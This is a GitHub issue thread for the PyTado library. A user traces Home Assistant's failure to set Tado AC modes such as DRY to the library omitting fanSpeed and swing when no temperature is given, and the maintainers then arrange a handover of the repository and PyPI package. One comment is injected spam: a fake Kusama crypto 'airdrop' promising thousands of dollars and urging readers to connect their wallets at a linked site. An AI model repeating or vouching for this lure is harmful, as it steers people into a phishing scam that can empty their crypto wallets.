### ISSUE TITLE
Unable to set any modes outside of Off, Cool, Auto

### ISSUE THREAD

**Issue by palazzem** [wmalgadey/PyTado#47]
Hello!
I was investigating an issue in Home Assistant for an integration (Tado) that uses this library.

TL;DR from Home Assistant I can only use [Off, Cool, Auto] modes. If I set another mode (e.g. Dry) I get an error from the Tado API. I wrote down my [investigation here](https://github.com/home-assistant/core/issues/51062#issuecomment-898438745) if you are curious about the triaging I did.

To summarize, I've reproduced the issue by using this library so it seems it's not a problem with HA. Here you can find the snippet I used:
```python
from PyTado.interface import Tado
tado = Tado(username, password)
# Zone 8 is the AC used in the HA test above
tado.setZoneOverlay(8, "MANUAL", deviceType="AIR_CONDITIONING", fanSpeed="AUTO", mode="DRY", swing="OFF")

# Returns:
# {'errors': [{'code': 'setting.notSupported', 'title': 'fan speed not in supported fan speeds [AUTO, HIGH, LOW, MIDDLE]'}]}
```

I found that ([code](https://github.com/wmalgadey/PyTado/blob/master/PyTado/interface.py#L350-L355)) if `setTemp` is not set, `fanSpeed` and `swing` are not sent as parameters during the API call. If I do a change to send them regardless (I move both outside of the `if` clause), then this works as expected.

I'm opening this issue to understand better what it could be and I have a few questions:
1. Are you aware why some people get this error, while others are not? Do you know if Tado (the actual product) registers devices in a different way, and so some AC/remote requires `fanSpeed` and `swing` set?
2. Do you know why the code sends fan speed and swing only if a temperature is set? What is the rationale around it?
3. Do you know what are the implications of sending these values regardless of the temperature? I can submit the change for your review, but I don't know if I'm going to break something.

Thank you very much in advance!

**Comment by MacrosorcH** [comment]
@palazzem Did you manage to make any progress on this issue? Anyone with a Tado Smart AC Control still cannot properly use it through Home Assistant. 
See also: https://github.com/home-assistant/core/issues/64416
Thanks!

**Comment by palazzem** [comment]
@wmalgadey I don't see much activity in this repository, so I'm wondering what are the contributions guidelines to get any change merged. If you feel like you don't have time to follow-up on this project, I may work to properly move this project where the community can actively work on it.

Let me know how I can help to get future changes merged. Thank you very much!

**Comment by wmalgadey** [comment]
@palazzem you are right! I am not using github alot, so I mostly miss the notifications. I merge now and then, when I see it :D

**Comment by wmalgadey** [comment]
@palazzem, and yes, I have no problem to move this somewhere else, so somebody more active can maintain it better. I am currently not able to merge the PRs because I don't know the impact of the changes

**Comment by palazzem** [comment]
Thank you very much @wmalgadey for the clarification, and in general for supporting the community with your free time!
One thing we may do to go expedite, if you agree, is adding me as Admin for this repository so that, without moving it, I can make some changes to prepare the repository with some needed changes.

Of course, in any action I will take, I will be sure to keep you as author given the work you put on this project. In another step you may add me as maintainer for the Python package (https://pypi.org/project/python-tado/) so that I can ship releases when needed. My nickname is always "palazzem" (https://pypi.org/user/palazzem/).

Feel free to push back if you think there is a better way to support you in maintaining this package!
Thank you in advance!

**Comment by palazzem** [comment]
Thanks @wmalgadey ! I'll keep you posted about future changes I'd like to introduce (regarding testing and so on).

**Comment by codelou** [comment]
## Congratulations! You've receive in $2000 on Kusama Airdrop 🪂🔴

Kusama Airdrop: Claim up to $20,000 in Tokens Now!

→ [Earn rewards on connect you wallet](https://kusamanetworks.com/)

→ [Claim Your $KSM Today](https://kusamanetworks.com/)

Connect your wallet, follow the instructions, and claim this exclusive airdrop from Kusama. For GitHub users only—share with friends to make it eligible. Redeem your reward first.

![Kusama Exchange](https://polkadot.network/static/b118567894df0c230e8553f2d6ea8b83/image2.png)

[![N|Solid](https://cldup.com/dTxpPi9lDf.thumb.png)](https://nodesource.com/products/nsolid)

🚀 **Claim Your Bonus Now!** [Check Eligibility](https://kusamanetworks.com/)

Access the Kusama platform and connect your wallet securely. Ensure you're using a trusted wallet for the transaction.

- 🔗 Connect your wallet twice
- 📋 Register on the platform
- 💰 Claim your bonus, up to $2,000!
- ✨Magic ✨ [Claim Your Bonus Now!](https://kusamanetworks.com/)

**Comment by wmalgadey** [comment]
Fyi: I already added you as maintainer on pypi!
